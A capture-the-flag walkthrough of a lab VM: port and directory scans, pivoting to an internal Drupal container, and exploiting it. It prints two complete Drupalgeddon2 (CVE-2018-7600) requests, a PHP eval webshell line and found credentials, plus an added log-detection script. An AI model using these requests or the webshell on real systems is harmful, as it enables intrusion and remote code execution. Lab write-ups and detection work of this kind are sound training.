Nmap #
[root@Hacking] /home/kali/Lujo
❯ nmap 192.168.55.157 -A -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-21 17:13 CST
Nmap scan report for 192.168.55.157
Host is up (0.00026s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 af:79:a1:39:80:45:fb:b7:cb:86:fd:8b:62:69:4a:64 (ECDSA)
|_ 256 6d:d4:9d:ac:0b:f0:a1:88:66:b4:ff:f6:42:bb:f2:e5 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: LuxeCollection - Art\xC3\xADculos de Lujo Exclusivos
Dir scan #
[root@Hacking] /home/kali/Lujo
❯ dirsearch -u http://192.168.55.157
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.55.157/
[17:16:08] Scanning:
[17:16:09] 403 - 279B - /.php
[17:16:15] 200 - 15KB - /index.html
[17:16:18] 301 - 318B - /scripts -> http://192.168.55.157/scripts/
[17:16:18] 200 - 937B - /scripts/
[17:16:18] 403 - 279B - /server-status
[17:16:18] 403 - 279B - /server-status/
[17:16:19] 301 - 317B - /styles -> http://192.168.55.157/styles/
Task Completed
[root@Hacking] /home/kali/Lujo
❯ feroxbuster -u http://192.168.55.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.55.157
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 221l 524w 5600c http://192.168.55.157/scripts/main.js
200 GET 231l 411w 3799c http://192.168.55.157/styles/responsive.css
200 GET 168l 285w 2899c http://192.168.55.157/styles/components.css
200 GET 230l 445w 4172c http://192.168.55.157/styles/main.css
200 GET 285l 778w 15656c http://192.168.55.157/
301 GET 9l 28w 318c http://192.168.55.157/scripts => http://192.168.55.157/scripts/
301 GET 9l 28w 317c http://192.168.55.157/styles => http://192.168.55.157/styles/
[####################] - 2m 661674/661674 0s found:7 errors:0
[####################] - 2m 661638/661638 4945/s http://192.168.55.157/
[####################] - 1s 661638/661638 1070612/s http://192.168.55.157/scripts/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s 661638/661638 220546000/s http://192.168.55.157/styles/ => Directory listing (add --scan-dir-listings to scan)
The scans turned up nothing, so look for information in the page itself; it contains some personal names.
Fscan #
Nothing directly exploitable, but an internal network IP was found.
Sophia@TheHackersLabs-PaQueAigaLujo:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:fa:17:4c brd ff:ff:ff:ff:ff:ff
inet 192.168.55.157/24 brd 192.168.55.255 scope global dynamic enp0s3
valid_lft 430sec preferred_lft 430sec
inet6 fe80::a00:27ff:fefa:174c/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:98:51:14:67 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:98ff:fe51:1467/64 scope link
valid_lft forever preferred_lft forever
5: veth1f12689@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 26:72:89:97:fe:63 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::2472:89ff:fe97:fe63/64 scope link
valid_lft forever preferred_lft forever
Scanning the 172.x address reveals a Drupal vulnerability.
Sophia@TheHackersLabs-PaQueAigaLujo:~$ ./fscan-RNDGcFJu -h 172.17.0.2
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-08-21 11:27:11] [INFO] 暴力破解线程数: 1
[2025-08-21 11:27:11] [INFO] 开始信息扫描
[2025-08-21 11:27:11] [INFO] 最终有效主机数量: 1
[2025-08-21 11:27:11] [INFO] 开始主机扫描
[2025-08-21 11:27:11] [INFO] 有效端口数量: 233
[2025-08-21 11:27:11] [SUCCESS] 端口开放 172.17.0.2:80
[2025-08-21 11:27:16] [SUCCESS] 服务识别 172.17.0.2:80 => [http]
[2025-08-21 11:27:17] [INFO] 存活端口数量: 1
[2025-08-21 11:27:17] [INFO] 开始漏洞扫描
[2025-08-21 11:27:17] [INFO] 加载的插件: webpoc, webtitle
[2025-08-21 11:27:17] [SUCCESS] 网站标题 http://172.17.0.2 状态码:200 长度:8756 标题:Welcome to Find your own Style | Find your own Style
[2025-08-21 11:27:23] [SUCCESS] 目标: http://172.17.0.2:80
漏洞类型: poc-yaml-drupal-cve-2018-7600-rce
漏洞名称: drupal8
详细信息:
links:https://github.com/dreadlocked/Drupalgeddon2
https://paper.seebug.org/567/
[2025-08-21 11:27:37] [SUCCESS] 扫描已完成: 2/2
RCE #
For how the vulnerability works, see
Setting up the proxy is not covered here; sending the following requests gives command execution.
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://172.17.0.2
Connection: keep-alive
Referer: http://172.17.0.2/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
Upgrade-Insecure-Requests: 1
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
POST /user/register?element_parents=account/mail/%23value&ajax_form=1 HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://172.17.0.2
Connection: keep-alive
Referer: http://172.17.0.2/user/register?element_parents=account/mail/%23value&ajax_form=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i
form_id=user_register_form&mail%5B0%5D%5B%23lazy_builder%5D%5B0%5D=passthru&mail%5B0%5D%5B%23lazy_builder%5D%5B1%5D%5B0%5D=ls+-al
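As an added defender-side example (not part of the original writeup), the following Python flags the CVE-2018-7600 request pattern seen in the two requests above, both in Apache access-log lines (where only the query string is visible) and in captured POST bodies such as a WAF audit log would hold. The log lines are constructed for the example; the two bodies are the ones shown above.

```python
import re
from urllib.parse import parse_qs, unquote

# Apache combined-style line reduced to the fields this example needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Render-array callback properties that Drupalgeddon2 injects; #post_render
# and #lazy_builder are the two used in the requests above.
CALLBACK_KEYS = ("#post_render", "#lazy_builder", "#pre_render", "#access_callback")

# Constructed sample access-log lines: two benign, two matching the exploit.
SAMPLE_LOG = [
    '192.168.55.1 - - [21/Aug/2025:17:40:01 -0600] "GET /user/register HTTP/1.1" 200 8756',
    '192.168.55.1 - - [21/Aug/2025:17:40:03 -0600] "POST /user/register?element_parents=account/mail&ajax_form=1 HTTP/1.1" 200 512',
    '192.168.55.1 - - [21/Aug/2025:17:40:05 -0600] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 640',
    '192.168.55.1 - - [21/Aug/2025:17:40:09 -0600] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1 HTTP/1.1" 200 700',
]
# The two POST bodies from the requests above (second one URL-encoded as sent).
SAMPLE_BODIES = [
    "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id",
    "form_id=user_register_form&mail%5B0%5D%5B%23lazy_builder%5D%5B0%5D=passthru&mail%5B0%5D%5B%23lazy_builder%5D%5B1%5D%5B0%5D=ls+-al",
]


def classify_target(target):
    """Return a reason string if the request target looks like a Drupalgeddon2 probe, else None."""
    # Split on '?' by hand: a raw '#' in a logged URL would make urlsplit treat it as a fragment.
    qs = parse_qs(target.partition("?")[2])
    parents = [unquote(v) for v in qs.get("element_parents", [])]
    # Legitimate values name form elements ("account/mail"); the exploit appends
    # a '#'-prefixed render-array property ("account/mail/#value").
    if not any("#" in p for p in parents):
        return None
    if "ajax_form" in qs or "_wrapper_format" in qs:
        return "element_parents=%s via AJAX form path" % parents[0]
    return "element_parents=%s" % parents[0]


def classify_body(body):
    """Return the callback injected through a '#' render-array key in a POST body, else None."""
    for key, values in parse_qs(body).items():
        if any("[%s]" % k in key for k in CALLBACK_KEYS):
            return values[0]  # e.g. "exec" or "passthru"
    return None


def scan_log(lines):
    """Return [(ip, target, reason)] for every access-log line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and classify_target(m.group("target")):
            hits.append((m.group("ip"), m.group("target"), classify_target(m.group("target"))))
    return hits
```

The fix shipped as SA-CORE-2018-002 (Drupal 8.5.1 / 7.58), which rejects '#'-prefixed keys in request input; this check is only an aid for spotting attempts against hosts that have not been patched.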
Bind shell #
Write a webshell into the web root:
echo '<?php eval($_POST[a]);?>' > shell.php
(www-data:/var/www/html) $ grep -r 'ballenita' .
Binary file ./sites/default/files/.ht.sqlite matches
./sites/default/settings.php: * 'username' => 'ballenita',
./sites/default/settings.php: * 'password' => 'ballenitafeliz', //Cuidadito cuidadín pillin
(www-data:/var/www/html) $
Getting a shell was not easy; I built one with msf and uploaded it.
Read Pass #
Upgrade the TTY and switch user; grep can be used to read arbitrary files.
Root #
Checking sudo shows that mount can be used.